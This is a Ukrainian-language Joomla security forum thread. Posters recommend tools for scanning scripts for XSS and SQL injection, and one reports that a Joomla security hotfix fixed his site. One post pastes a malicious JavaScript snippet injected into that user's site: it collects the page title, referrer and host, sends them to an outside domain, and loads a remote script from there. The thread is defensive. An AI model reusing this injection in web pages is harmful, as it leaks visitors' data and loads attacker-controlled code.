Перевірка скриптів на наявність XSS/SQLI

Налаштування Joomla та серверу для безпечної роботи сайту. Взломи та хакерські ходи.
shaman
Команда підтримки
Команда підтримки
Повідомлень: 287
З нами з: 07 травня 2007, 21:44
Звідки: Україна, Київ

Перевірка скриптів на наявність XSS/SQLI

Повідомлення shaman » 21 липня 2008, 17:55

Проект венського Університету Інформаційних Технологій розробив утиліту для комплексного сканування файлів на наявність вразливостей XSS та SQL injection.

Програма написана на мові java і здатна працювати локально. Скачати та ознайомитись з документацією можна тут:
_http://pixybox.seclab.tuwien.ac.at/pixy/index.php
Також існує тестова онлайн-версія, де в реальному часі можна просканувати підозрілий файл:
_http://pixybox.seclab.tuwien.ac.at/pixy/webinterface.php

Зауваження
При скануванні файлів joomla, скрипт вважає підозрілою частовживану змінну

проте, як зазначив Smart на joomlaforum.ru - це не є критичною вразливістю, особливо якщо вимкнені register_globals.

п.с. Звісно, програма не замінить людську логіку, проте значно звузить коло пошуку і збереже дорогий адміністратору час ;)

Аватар користувача
Dutch
Адміністратор
Адміністратор
Повідомлень: 1187
З нами з: 28 жовтня 2006, 18:49
Звідки: Київ
Дякував (ла): 3 рази
Подякували: 12 рази
Контактна інформація:

Перевірка скриптів на наявність XSS/SQLI

Повідомлення Dutch » 09 січня 2016, 20:36

Я б ще додав би до списку хороший скрипт ai-bolit!

https://revisium.com/ai/
fedun
Користувач
Користувач
Повідомлень: 6
З нами з: 23 червня 2015, 15:28
Звідки: Івано-Франківськ

Перевірка скриптів на наявність XSS/SQLI

Повідомлення fedun » 15 січня 2016, 20:39

В мене ця фігня. Як закрити діру, на всіх версіях Joomla включаючи останню. :evil: :evil: :evil:

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://www.elkonenerji.com.tr/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
fedun
Користувач
Користувач
Повідомлень: 6
З нами з: 23 червня 2015, 15:28
Звідки: Івано-Франківськ

Перевірка скриптів на наявність XSS/SQLI

Повідомлення fedun » 25 січня 2016, 12:46

по ходу закрили дирку, критичні виправлення безпеки у всіх версіях Joomla, обновляємось до 3,4,8
https://docs.joomla.org/Security_hotfix ... L_versions
для старих версій є патчі :Yahoo!:


  • Similar Topics
    Відповіді
    Перегляди
    Останнє повідомлення

Повернутись до “Безпека сервера (хостингу) та сайту”

Хто зараз онлайн

Зараз переглядають цей форум: 0 і 0 гостей